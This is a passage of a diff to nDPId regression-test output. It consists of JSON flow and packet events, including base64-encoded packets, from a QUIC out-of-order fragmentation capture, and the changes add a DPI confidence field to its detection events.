 00626{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":68,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433521961,"flow_last_seen":1621433521961,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433848159,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"16.232.218.117","src_port":64700,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00625{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433848159,"flow_last_seen":1621433848159,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433848159,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":59680,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02315{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1621433848159,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621433848159,"pkt":"AAAAAAAAAAEAguyCCABFAAViV7ZAAH4RzIyokEAFdZR1HukgAbsFTrrGzv8AAB0IZrtHVazP7GUANwCdzwl\/Ag4dMP\/532YmgteM9y4rfgnxKHdwAMQTxGHIHdDGRBEdHlnPsFRQLnkLCUyj+ZiMcQtE\/ZbnAwVVwgmAbJeZzFu0xe9BjJU+0q0ZPjc4pl\/q1xAOsn94uZ6J3jN9QX92abvAtxhYz8VeBqrOA607zbwY9GWSP6ok9Pja\/Fq8w8NDCZGf3qIL3rk\/wAzA3jEYpRRQWDHceKbIR88KOcO1FL8LDN9LJGuLhgF5FQs6DJLnrpIczBSYq4OBwz\/\/sKd1SAUQJMcAmfR\/jZPeYBnpsWTjRALFzwpImgbStENOm\/0p3NLhVUB6WCiKCvKKk9gT6\/d\/x10ux08ULPTBXIv\/k4Ll8l6sgA2ueorwPBTauFi21MhZZCtPcV3eJ6EUWMMMFrZfATCNoB+EVA44T4fDxdcOZEzFwjnKteEZmVkDbqqZ9qjV5YV3p\/6BGB2jz47XkvU4EacBYHhxZ2ZBLwV2tLuqe7+aE8IdEygSC4TSRNL49Ttq\/RQwV8aObYvXamg93UAuYbgkXDq6Cz0FVo2RyS4gV5roXuZXS44vxfS1oZOfTTNFzIHJUGwN9JEwtlJyaLE+zlmDRVeeKLag0ryJrnplqRANQHZqgBEbDtwGPSRu34eTOgLm4WHJcagJTF4Fz7xu6\/\/DDYatKPQYRG7oY7IYZQm7mhylJ7uBUzlcqBwaflcUNmXybTxJ+2WD0zZz6gCJLVhgwyhutJAlQanGkuwf3EdmqBx8ceqxoNJ7tZKAGK6ZLIa3G6I1xZC\/TaQ+1KZfZAfI4pB3hAXWDjm2gcWEJXPdl2HpQhbj4SN3C\/MogkQ6jmjo2la2vWjIQ2+qzYSkHj832CLT58yzA0tGXZvR5lpaU6hPOvYp9D+DMoC0H2it5Bi\/rirv+bbZpE7LzsCnG1SyGV0J0MpJPpexlnfbb0tXuruzppFFVv8XX\/\/AGNTxslc2JJDce0W3BO9U2F7QbGNMDxkz\/wBWOEZH8+aF8yWPCo26iB0IWKm64gR8orVp9wCN\/S\/ux5zHmhkRNoUehIoFt23QRRYl4mEM8Kb+yNY6ExrRhuVVLVK07imb+PWqHfegN+A6yiJIol96tI\/qRwPHidTWuw+BPOds5nSGwNNMYCpCNYS7znyftMnQYiHdYUMEr1nkXG0p+BTVDr6yzplTCLHGEroPKNnH8e3DVvViJ3UCgrkqYMJFZa415l4iDMaX1IPVcIVbn0GJt+fxcZSe\/4EBL\/Lglqu4lLqW8vfP3Ryp18CcBI5AUvjnbHT3H9GKw1At8VX0EmM6FNbrzmSDDHpjxJAjZFsnjcKA4s8cGEzjtd04U5Ov1l\/uV+TrsjbEVaYIN3cAlR8CmLid56lf832bUt\/rJVHoQNMALy35MqNi3UTMRHx2sOalpm1X2yqB6Qcr8RiPpnVvJ0XaoyVa69ClIE\/D0J\/eeWPqDxqyOq2dFObeT\/Q3Ey6oum6f7LqZWXPfk\/Of0coJY79h0DaTGeZt8KNREQgsRBcylskDOu5tf2QjszGuOPnHGGIjoEkML3giU2HtWNdhUpR6kCeVzhBvo+CYlsFw0XUh5F8NiKLotZ\/peNJe9m5PV26VmA1CuJnJUZ+iTsXmSUkD0eRX0gnwfjJ6dq\/oMKsvWsVcGcwOkeW0MrEVdWGsBJjfzNjkVIa433oGL9UgwBMpD4PWzwUd+SNd+1vgvOeW4tFbxfn\/XBNWVoFAyPSzEwkXy++b+c1GHJidlATTQULFM1qwYz4DqrTvS\/tKosbIdtvCa5V\/Wk2K\/pjchLwN"}
-00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433848159,"flow_last_seen":1621433848159,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433848159,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":59680,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433848159,"flow_last_seen":1621433848159,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433848159,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":59680,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433861442,"flow_last_seen":1621433861442,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433861442,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"217.254.108.174","src_port":57565,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02302{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1621433861442,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621433861442,"pkt":"AAAAAAAAAAEAO9I5CABFAAViZLJAAH4RY5aokEAF2f5sruDdAbsFTnSvyv8AAB0IrXE1PswUxeQAAEU0moW2I5LE8O2RChniUsRu3mGuowplCLtASVZHqsnxug4PsDrEW3Sj\/leTPqj5zsaBrtRlsbN9lOBqairoOcWnpMpgmaHQCpPptKrsTiKLv9DzkKDiiyP+Mqe+\/mlEdOWIT57m\/bm9VRc8tH+phNv28+B7nLrNXNbf+JIcCMe3B97c2i01lE5nP9lOGBndD+gNN+RzjizdPjT7CsIXwfii\/vPw0hQi3TTTCgYsoE3qaYNZIQa7y+ZulLHbauYPh7IRvVbsW6oMX5mqUpOCkwTG7qK3J0PWf+WY+NS17Sud\/qUl+vWLY3nRgL5hCL2d62+ht1MFTAd\/54SptMH7UTOp0SLwM2rzQ7K1vfHvBg0P1XtZu5\/ZPCWf9HzATlzy7lSiJk6IgXbAhRFG1G8fUp4\/ofu+HGCEF\/7UDhsGZrHHdSkUntprrQdJrtC9uwLQHDmvwvf+IflTbSL1rDFYxHI8L4wWpQGIUOrApnE\/9cNQvTN\/qDlFELbRPZMI+sgmXFe1wpxWQvJnUzbEgibgAlOEoK0YMMr00gbYRHnt\/XmwqnfPUMgFPhthy2NaZGYNKqtyo2LV+qQNOXTYs+yqM7Oe60KVRE8NtfRjTThOKaPHFROsWvuzwA+ukNXH9pokuvNAsPejuPAD\/pIIAFoeLo9EdQWTjq8bmJHRJLeQdgOixkkn6ZENEVhcApyT3Cjpyjy6XOyeAvH1rOAqQH1f5XGmtLPBx0PHlTgWwMQNd1EMcY81AvslHkFJ28FdohsGkQMrtF6QnW4yyffpqKjZGXR4Aft\/6zwVouPtFf+c842WgjqV9zAXzrH+Q4FG8Bkm133cuN6x\/UQjBUG9ulPeffB4LFwzJ6cgdlk8sALE9OsSEEFoZ7Kgq2RJG2B4QiAcvJ\/G23JlL4GPLCphHQL+uuXuBJ53c0dwm5IgyJmL+Fkv\/oWmjZHaja9h6d+MuXfjhw22jLCFl4NqE+v2ig\/Upn3KknaXhJpMXjSzUNFPLHancjwMFUrmgiHOiCGbChAN7KNYiHqvDaXEYjnuJfY1oM5mhTGv+oeOS3sb+HmH2iJecdF8bXE2rbafbwa6Uiv9ikM1BTBN7UiXD5IlCeKhBSPAXD2EauGLnJC8pFr5zgHjAQh4mgtnSEZQ0zN3cIdAyuQFOV8jS+\/nBwLOE8x1n4uqLxML18glCa2oWZgACniabrs7r2NaqfObdjspQwzjkU1TDyb5gdlLj\/eHIpfAuefXCBvRbCcBcf3j6IilvS6+AsNo2EQaT9604HtRnmqrZY9SdTX65A28Jmq3pM9OvQ\/TUFf5yYcqxQ9haiwBaX+NvsVDdtRqsd5\/7eI5m8Kz23+blc4m9ONL7svDOPbX8ss3fOhktK2bl8ThuCTTF503OHo06Lwdf8CjZvVZNlx9x5F\/PfM3mGcuSEt3i52BYpDCMhsRFqfjcUkuPmzCH58lXX47a19QYjODRwQE3Q0zKcLxx79OB9EdMQ85AedN\/Yq1ncVuwuxGbXOoZGRxYBpfpp+NMq0YojthjxX0BlTnVyrSw5lnJpqEdmlVw2bcD9yZZWHwXJvKr5qpx\/cr9xPEvlHadBYAjoEENWkL3gQJjVHBrOhAB1uTYhdNnltIi8vWgTzELMZlpUHeqiLODHWpAl4WXW8xnY8PcTaYP+SnKQgJmd43Zakfel6+p23x5PQixUcbkwGMl2kk7UtX\/gGRLqBBO2NRLJN5MePtLUrUVSVwbZY282tQGPil07XxyVmzfQkhzkp4eJ5a\/N1QTFtfiCHdNogD"}
-00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433861442,"flow_last_seen":1621433861442,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433861442,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"217.254.108.174","src_port":57565,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433861442,"flow_last_seen":1621433861442,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433861442,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"217.254.108.174","src_port":57565,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00624{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433861875,"flow_last_seen":1621433861875,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433861875,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"143.52.137.18","src_port":52387,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02316{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1621433861875,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621433861875,"pkt":"AAAAAAAAAAEAAWXVCABFAAViHWZAAH4R2UiokEAFjzSJEsyjAbsFTgvjw\/8AAB0I4XSW+s91uvMANwAS6GfjW0GMdTsqKMpwqTx337NvtDulmldgfnpNodm4QCw5Bjnjn9W+uBm+YhsF1Trj\/EVP9+xE\/ehiNLKErhY79Fc\/HJEeNp62+UYmQIxnF4BXHeby7saDvvQlaWtUhK2nNgwODZK+JDEtxkUQ\/VybQVP83ATzWc0qLvD8yBtR7czNUAqQeB0mf7V5GtJz0rLXU9erE4DOq5Qs\/9FCIz7bDlqW8m3GqwlAlM\/ShYpSh+i1tk19DnlT9d71cXWxAaBMh3SgHyMdgTEnDOAcddGzDaeO7lK6Q+fWEYvrhEHvLyLGKNSZUeJYxc\/icjZAwxx1JsyytVVfcjM\/mcdecpSw9Bmojler9Rg2Ujayse\/kuXuiAg+1NTMXX33ZL2rhDQtAjmZrBrfEVHGmJy+0cMtd+79bvpVApkexLNObFkVRwaBswWlkZfKVtffBr4kfbBTWyXOmnhO01cFVCjdQL\/BWZouvBCtlDnK59GQE47E\/QE9JjfWDLKIpllBc19+E+UnP0GbmHg\/0unruvB08k6BhVSiKRaeDIjirm9O9wbEuKHWikZtOKgn0vdcW3o49vZELiyS8Oh0eH9i10QOv1F\/ixGOhJ7Q9oRu9TNyMYSO08q0kVm7c2CA73Gt23SuU\/bhClfdnHjyNCfLe1tTbcknZFj\/ikotBSaPjBSmkP\/K1gB+2W38hHc\/pDDGJn\/1HKhUE2jJHeTGdUUEt\/nIx7qb\/Qem+IcovQc0vl5iKASp+ml4MLegR\/yOFMMAwayIHpj4zjxWU8b5eorYjA3a11PNOPq+Diwo4jSkCwWP\/NQrR6of3bBVoaXisVa9wpr4IMIfCHiFcIgOR96+r4oTypl7Gu8zq2gdbwI6YjUXUc52tqJWY3kkxwvYV3OqU8QnVDcS8NgM3sBNbtUWYevWYZ5kG\/xc6I9RBB93tEOa2yK\/MLrNRzd2ly4YTi8cHvLzZ4JO8StA2rNVX7gEP+80+zHm0dnXITPxyYwSedSInn\/pNvSAPgpaQZutI98VHsSgXt2AGJ1MMrh4KLNemtCZ0sd2YqrNsd0v\/Q\/CUZ1ILOe3p+l5wVi9Zn43HdgMKjjQliDoQWt6oPzDKQdarw2zvf2CSBY+WIBwbxkvSJ254+5B740QdtviqaFSVrXzi7RfFwi+ivbVv+NHhY1sdpuJtIIOCprt6WYhs+StriI4nyZAJwcdp32W8aqvb\/1985ZY6u+nxx4f2trOGoh+bHJBuPbElLY3maoHSuOXZ785q+vKdky1ER+vTTeciB3UUV2EsQxGisoRd3HsY14dMPd\/KtnJkfnSo9huSkgv6uqscOmR3O15K2wVr1cJTHHoYe8xmAfEt31ohtVVGBkqoyfKwhTy83VRvvkyyeMMzfXCvOEXQzPUnps\/izhGZQO1uJuDErdBO8cpI3nRLPMCD\/UdOq6K0a\/lUA2\/RmUzFI+l6dkQCJFczxVxFEsgIriEhhycx8gi4LqlH4ujmWOaJbxFhSFcxnusPel+AYrO\/saFdGOX6zbAvXOzVPrMBiZjZC6L4YNHykbx\/ACsbmx2tWJ0UBsImPtqc3VN8uY2G\/l672JNHVL4kWCmPOASo\/9VfXHfz9oDR2A9rIFyPu2yDMiXJyLW7o6SypanBfAjWm99ANW\/QN19miCc22rNTHysZikzeNz6bIeFmyLS3Ngnlk7euJrOCdUrQrLMzQVLmQ\/RtVvjMOEklG0mmb1U0vbtTHQFDaG3odQNuXNPFHDfi8wFpWHR9i\/WEKv+nJwW23RrP6NiuaqLXBX+0"}
-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433861875,"flow_last_seen":1621433861875,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433861875,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"143.52.137.18","src_port":52387,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00690{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433861875,"flow_last_seen":1621433861875,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433861875,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"143.52.137.18","src_port":52387,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00628{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":71,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433848159,"flow_last_seen":1621433848159,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433949433,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":59680,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":71,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433949433,"flow_last_seen":1621433949433,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433949433,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":49860,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02307{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1621433949433,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621433949433,"pkt":"AAAAAAAAAAEAWIVLCABFAAVi\/AZAAH4RFwGokEAFcfqJ88LEAbsFTrCcz\/8AAB0IOpZExBi7cWoANwDL9uHaA0kckkofYv0DErOJu7gbuZ9O0WlrHu9XY7EghfeNZiWwbeaMEG1HVz2HXjvb7FiIQLhE\/XrtpQvuu\/3Omn1Xc2On2DZgH7f6oOHpbPUOYpms0\/qyqv6hTxaVN8Qyf9zFprmCdbR0TKFMTov\/mcwAhmtaqiJQOX1idcPmDuEg7iPhXhQ9Rg3RwrAk9BrfJvQxFfeEOMteWZD4MyDZ+yV9SiAuwwh+aqsiPNuxGOL+UtAzKQsqxym7hzR1q28tmGh+i2Zfk\/fZfni9+9jCbMGXciLv74dlIT7PTJbDgcbiIKwlBsLy\/knykvOWyjY094BIkBXk3yU5NleET3fprZZxZhV8ZWXPFIPEaF+RU6Htv70MXhBjSUlUKboeasdJJiERx9PP\/FOQwZ9brIMVelncnCNFZ46nArIPtPpuAd\/21AcBQuAfrDAMwGty4EHlw\/4EpTckdi6e8Q1HZa8uOZS8L8Br1Me9zLoyL4ZjxYSKprCH0SP1KvhqYL3GHK4Qay7ZVNjLEb+G56Co2cVZ6Z8h9R\/Vb5Kkek+Pkji+2fhLMmeX7GKMME7SjXSMGgLh6kG9e35UGvMzTHWm2oiUJJo5etspIs8CqI2hin1wFD6+4iM6vgMpZ1\/0hibOtrqATrfcRXn\/g3FcL\/RO\/V+7mXSO42YkAYxLa84v0N\/qNcWbspbFv6UUuZtGqJZj6gNVEV6zKBOfhdaZA6YCWC4HGrFtWO5PpwwVCgG3aalQZk8NUuhTNMXowyvh9L18LCMzCzLXkkowVa1Yrk+ACBdqcZ0NdAszss2Z\/EjjNmNifpEEEqUfgXYXLLAXFUhdn9KTgkgQJb6GidRjtio+hiOES7K\/Zd7kR9Rp9Q8wDhX+D6mhrqnUubbVrqMcM5J\/ZatN2j1E7+O4tATjd9IDFwcw4kKULkoQtjBOYHy1h\/oATwVF+VEEk5TAZlZMx5wT0IH9U8MEWVD8KooUS4KhPU7qWcQbSeYILfK051yDU8v1p35RNAMARwMz+aDEiPOl1NvT3vNB0NKpyA8dp2SOTKCt+U38vG+GnQA9V62d7ZUKYJ3KlxmDU6XA53hOV25AFsiPuoW6Iyhmf6HsaasYpE\/s6FIsRYPDWGHRq1MdouHttvkvAO+x3GFakZh3SiKhTE80kxe41OgEyoVuUyhRjr87DNUuENvzYlvEniWFEMpKV3srA\/SEnULC+0Ec4J3ujljBaufKdfF8SZpoN9j7BrC+MAqJq3d3VhpBG26mGJXkkc4FOZBB0fM\/Lhy0kTI83pcFnGWjj7XjivhZl42l7vBIKLjvLvvCQDgRAJQidieJyJhRuZYNfeY8eJjBRqpIKNqtcSkkmENkCxAYMCiOc0b0eIGuyHwfWl9DZKgiIkTs1P8VjoiaVtyxt\/mMFzkrdTau0IQVNDUvaqFADarA4i6F5X\/ztcJlv95UshqbL5rcKZuqHaDiKMW08lYpiumS+l0yCHCZdSG\/JKiFlfvCQuuO7wI8YM6N7g2OYZA0jS7vIYCufcCVOzadPPeliEKT+SdqnyQb1rT\/MrPC4qmZRKIvY7jNy8gfCXgs7p4XgbHvnaS7Dr9uRFum4Sn9Lk+LXgtcZE6ZRI7CQvZwF9N6AC\/1sN8XoPIf\/S8UYH\/UrL8QIB2dvW8d4m9grwcwhaVNrzDuYlH1t5w04qvmeO0jLTMXCRV\/LhJb7I6BPjU9fi6dVMzhz3YRA0knZgi9sfYpy0b4laLv5IQhdo7jIDxnDb0cqwQffN65VEIrS8UKXodV6nKpQ21X"}
-00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":71,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433949433,"flow_last_seen":1621433949433,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433949433,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":49860,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":71,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433949433,"flow_last_seen":1621433949433,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433949433,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":49860,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00626{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":72,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433848159,"flow_last_seen":1621433848159,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621434024831,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":59680,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00629{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":72,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433861442,"flow_last_seen":1621433861442,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621434024831,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"217.254.108.174","src_port":57565,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00627{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":72,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433861875,"flow_last_seen":1621433861875,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621434024831,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"143.52.137.18","src_port":52387,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621434024831,"flow_last_seen":1621434024831,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621434024831,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"185.186.183.185","src_port":60949,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02304{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1621434024831,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621434024831,"pkt":"AAAAAAAAAAEAO9I5CABFAAVijfVAAH4RD4yokEAFubq3ue4VAbsFTpL9z\/8AAB0IwEpXITGNfFsANwCxWhQSYIUF\/WvpOS2d24m86qS7bcPY9ZqXL9ETLTiw416RPBiWWmatxUNDS4V+myDEXn29IuVE\/cSbBImAl6aiOQIEBTB\/SXbMixQXFNoJB8yYQYz6wms++ZMMx\/E4BhzwHBpTBXPh7b4mD3YSWE+XxUv9H9L2UZXkzlxf97xn0ny\/fPI\/0BBls5vpYFjJSYZYoIlr6vhdm\/ebeHlyzz6B8ygezIiK3UwVDadwbjMZG9Omuh7X1DhVgs3vz1W21fFGWXozYn3VF4XUTA2SbApAP2UYTQPidrIUUsyN9OEN+6zFcRKwBgiXUg0JDK+e1z3gz3W745d\/sI1uFMBbzhwnhKRBQCTyj6OoDAeCC